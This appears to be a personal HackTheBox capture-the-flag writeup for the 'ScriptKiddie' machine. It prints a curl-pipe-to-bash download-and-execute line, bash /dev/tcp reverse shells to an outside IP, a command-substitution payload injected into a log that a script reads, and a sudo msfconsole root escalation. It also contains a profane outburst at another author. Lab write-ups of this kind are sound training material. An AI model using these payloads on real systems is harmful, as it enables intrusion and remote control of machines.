ScriptKiddie

📅 Last Updated: Jul 08, 2025 07:14 | 📄 Size: 3.2 KB | 🎯 Type: HackTheBox Writeup | 🔗 Back to List

1, enumerate ports and web-contents 22/tcp ssh 5000/tcp http Werkzeug httpd 0.16.1 (Python 3.8.5)

To be honest, I think this version of Werkzeug must have some exploits Werkzeug - 'Debug Shell' Command Execution `https://github.com/its-arun/Werkzeug-Debug-RCE.git

From the index page, we can know this is a nmap and metasploit usage website.

So let's check the command injections: Given that all three of these seem to be running binaries from a Linux system, I’ll try command injection in each input, but without luck. Any non-alphanumeric characters in the searchsploit box lead to this warning stop hacking me - well hack you back

Thus we can try to get some vulners of nmap or Metasploits By checking the Exploit-db, there is nothing high-risk vulners for nmap, but there is something interesting for MSF Metasploit Framework 6.0.11 - msfvenom APK template command injection So cool, the best rce vulner.

So let's exploit it !

We can use the msf to help us to generate the payload and we just need to upload it .

In this place, I must say I want to fuck 0xdf, I really want to say why I cannot handle my shell !!!!!!!!!

So in this place, I would use another way searchsploit -m multiple/local/49491.py Then change the scirpt :

# Change me
payload = 'curl 10.10.14.65/shell.sh|bash'

# make the shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.65/1337 0>&1

Then finally we get the user shell !!!!!!!

3, root shell There is another user pwn and there is a interesting script for us.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Reviewing the script, it is setting the log variable to /home/kid/logs/hackers. Next, it is changing the directory to the /home/pwn directory. After changing the directory, it uses cat to read the log file. Next, it uses space as a delimiter on the third field. It then passes the results to a while loop as an IP address and uses nmap to scan the IP.

Now that I understood what the script was doing, I should be able to craft a payload that gets executed. By echoing a payload to the /home/kid/logs/hackers file, the payload should get executed. However, I need to ensure that the payload is within the third field of the log. I started a netcat listener on port 1338 and then used echo to add the following payload to the log file.

kid@scriptkiddie:~$ echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.14.65/443 0>&1")' > /home/kid/logs/hackers

Then we get the pwn shell and we can check the sudo -l

Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

With that in mind, I launched Metasploit with sudo and then dropped into the ruby shell as root which allowed me to capture the root flag.

sudo /opt/metasploit-framework-6.0.9/msfconsole
irb
system("/bin/bash")

Then we can run /bin/bash as root